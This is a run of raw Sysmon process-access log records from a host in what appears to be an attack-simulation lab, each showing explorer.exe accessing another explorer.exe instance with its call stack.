16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 